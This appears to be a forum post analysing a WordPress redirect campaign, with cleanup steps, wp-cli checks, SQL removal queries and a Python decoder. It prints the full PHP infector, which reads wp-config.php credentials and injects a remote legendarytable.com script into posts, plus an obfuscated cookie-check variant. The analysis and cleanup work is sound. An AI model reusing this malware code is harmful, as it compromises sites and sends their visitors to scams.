Kev

Thousands of WordPress Sites Hacked to Redirect Visitors to Scam Sites


Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic.

 

"The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Krasimir Konov, a malware analyst at Sucuri, said in a report published Wednesday.

 

This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice.

 

The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects.

 


 

In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser.

 

The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites.

 

"It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts," Konov said.

 


 


It comes from the "Elementor" plugin.

 

Here is the source that "infests" the sites:

 

<?php error_reporting(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
echo "ssqqss>>>";
$d = $_SERVER['DOCUMENT_ROOT'] . "/";
$files = array();
for ($i = 0;$i < 3;$i++)
{
    try
    {
        $az = shell_exec('find ' . $d . ' -name "wp-config.php"');
        $az2 = explode("\n", $az);
        foreach ($az2 as $file)
        {
            $fil = explode("/wp-config.php", $file);
            $fil = $fil[0] . "/wp-config.php";
            array_push($files, $fil);
        }
        $d = $d . "../";
    }
    catch(Exception $e)
    {
    }
}
$l = "/";
for ($i = 0;$i < 3;$i++)
{
    try
    {
        $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l);
        $display = Array(
            'php'
        );
        $search = Array(
            'wp-config.php'
        );
        $files_ar = array();
        foreach (new RecursiveIteratorIterator($it) as $file)
        {
            if (strpos($file->getFilename() , 'wp-config.php') !== false)
            {
                array_push($files, $file->getPathname());
            }
        }
        $l .= "../";
    }
    catch(Exception $e)
    {
    }
}
$files = array_unique($files);
foreach ($files as $file)
{
    make_index_blog($file);
}
die();
function get_var_reg($pat, $text)
{
    if ($c = preg_match_all("/" . $pat . "/is", $text, $matches))
    {
        return $matches[1][0];
    }
    return "";
}
function getijstonemoretime($path)
{
}
function make_index_blog($path)
{
    echo "iii->>try:" . $path . "<br />";
    $az = shell_exec('cat ' . $path);
    if (strpos($az, "DB_PASSWORD") !== false)
    {
    }
    else
    {
    }
    if (strpos($az, "DB_PASSWORD") !== false)
    {
        sqldo($az);
    }
}
function sqldo($content)
{
    $siteurl = "null";
    if (strpos($content, "DB_NAME") !== false)
    {
        $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $conn = new mysqli($host, $user, $pass);
        if ($conn->connect_error)
        {
            echo $conn->connect_error;
        }
        else
        {
            $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'";
            $result = $conn->query($q) or die($conn->error);
            while ($row = $result->fetch_assoc())
            {
                $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'");
                if ($result5->num_rows > 0)
                {
                    $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . "  where option_name='siteurl' LIMIT 1 ";
                    $result2 = $conn->query($q2) or var_dump($conn->error);
                    while ($row2 = $result2->fetch_assoc())
                    {
                        $val = $row2['option_value'];
                        $siteurl = $val;
                        echo "iii->>find222:" . $siteurl . "<br />";
                        if (strpos($siteurl, "://") !== false)
                        {
                            $k = file_get_contents($siteurl);
                            if (strpos($k, "legendarytable") !== false)
                            {
                                echo "iii->>contains:" . $siteurl . "<br />";
                            }
                            else
                            {
                                $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'";
                                $result9 = $conn->query($q9) or die($conn->error);
                                while ($row9 = $result9->fetch_assoc())
                                {
                                    $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "  LIMIT 1 ";
                                    $result8 = $conn->query($q8) or var_dump($conn->error);
                                    while ($row8 = $result8->fetch_assoc())
                                    {
                                        $val8 = $row8['post_content'];
                                        if (strpos($val8, "legendarytable") === false)
                                        {
                                            $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'";
                                            $conn->query($q3);
                                            echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                        }
                                        else
                                        {
                                            echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        $conn->close();
    }
    return $siteurl;
}
function search_file_index($dir, $file_to_search)
{
    $files = @scandir($dir);
    if ($files == false)
    {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false)
        {
            search_file_index($dir, $file_to_search);
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/")
        {
            search_file_index($dir, $file_to_search);
            return;
        }
    }
    foreach ($files as $key => $value)
    {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path))
        {
            if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false)
            {
                make_index_upload($path);
            }
        }
        else if ($value != "." && $value != "..")
        {
            search_file_index($path, $file_to_search);
        }
    }
}

 

In the files, another version (the one with the cookie check) looks like this:

 

// Decodes to: $v = "preg_match";
$v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104);
// Decodes to: if(!preg_match("#wordpress_admin|wp-settings|wordpress_logged#i", implode(" ", array_keys($_COOKIE)))) { ... }
// i.e. the script tag is only emitted when no WordPress login/settings cookie is present (visitor not logged in).
if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).
chr(45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).
chr(108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){
// Decodes to: echo "<script src='https://trick.legendarytable.com/news.js?v=6.3.2' type='text/javascript'></script>";
echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).
chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).
chr(101).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).
chr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).
chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).
chr(105).chr(112).chr(116).chr(62);}

 

To verify the checksums of the core files, I recommend wp-cli.

 

Example:

 

./wp --allow-root core verify-checksums
Warning: File doesn't verify against checksum: wp-login.php
Warning: File doesn't verify against checksum: wp-admin/index.php
Warning: File doesn't verify against checksum: wp-admin/admin.php
Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php
Warning: File should not exist: wp-admin/try.php
Error: WordPress installation doesn't verify against checksums.

 

It should give something like this:

 

./wp --allow-root core verify-checksums
Success: WordPress installation verifies against checksums.

 

The scripts also need to be removed from the posts (wp_posts). They can be identified very easily with a MySQL query:

 

select * from wp_posts where post_content like '%news.js%';

 

They can also be removed from wp_posts using replace. Here you can see that there can be several versions. You can extend the search to %script% and/or legendarytable and then replace whatever is necessary.

 

update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", "");

 

There is also another version that installs 2 (inactive) plugins through which they can run various things.

Another version checks the cookies. Where cookies exist, it does not redirect to other sites. It only targets new visitors, whom it redirects.

 

Advice:

1. Stop installing every damn plugin.

2. Use a damn Content-Security-Policy! :)))
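As an added example (not code from this thread, the article, or the malware itself), a Python helper that decodes chr()-concatenation runs like the cookie-check variant above and strips the injected legendarytable script tag from exported post_content, generalising the exact-match REPLACE above to both variants seen in this thread (jack/v=1.9.9 and trick/v=6.3.2). The sample PHP and post HTML are constructed.

```python
import re

# Constructed sample (not from the thread): the same chr()-concatenation scheme as the
# cookie-check variant above, shortened. PHP allows whitespace between "chr" and "(",
# which is why the wrapped "chr\n(45)" form in the original dump still runs.
SAMPLE_PHP = (
    "$v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104);\n"
    "if(!$v(chr(35).chr(119).chr(112).chr\n(45).chr(115).chr(101).chr(116).chr(116).chr(105)"
    ".chr(110).chr(103).chr(115).chr(35).chr(105),implode(\" \",array_keys($_COOKIE)))){"
    "echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62);}\n"
)

CHR_CALL = re.compile(r"chr\s*\(\s*(\d+)\s*\)")
# A run of four or more chr(N) calls joined by "." is almost never legitimate PHP.
CHR_RUN = re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*\.?\s*){4,}")


def decode_chr_runs(php_source: str) -> list[str]:
    """Return the literal string each chr()-concatenation run in php_source builds."""
    return [
        "".join(chr(int(n)) for n in CHR_CALL.findall(run.group(0)))
        for run in CHR_RUN.finditer(php_source)
    ]


# Matches the injected tag regardless of subdomain (jack., trick.) or ?v= version,
# so one pass covers the variants seen in this thread instead of one exact REPLACE.
INJECTED = re.compile(
    r"<script\s+src=['\"]https?://[\w.-]*legendarytable\.com/[^'\"]*['\"][^>]*>\s*</script>",
    re.IGNORECASE,
)


def strip_injected_script(post_content: str) -> tuple[str, int]:
    """Remove injected legendarytable <script> tags; return (cleaned, number removed)."""
    return INJECTED.subn("", post_content)


if __name__ == "__main__":
    for literal in decode_chr_runs(SAMPLE_PHP):
        print("decoded:", literal)
    sample_post = ("<p>Hello</p><script src='https://jack.legendarytable.com/news.js?v=1.9.9'"
                   " type='text/javascript'></script>")
    print(strip_injected_script(sample_post))
```

Run the decoder over suspect files found by the checksum scan above; for post cleanup, feed exported post_content through strip_injected_script and write back only rows where the count is non-zero.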
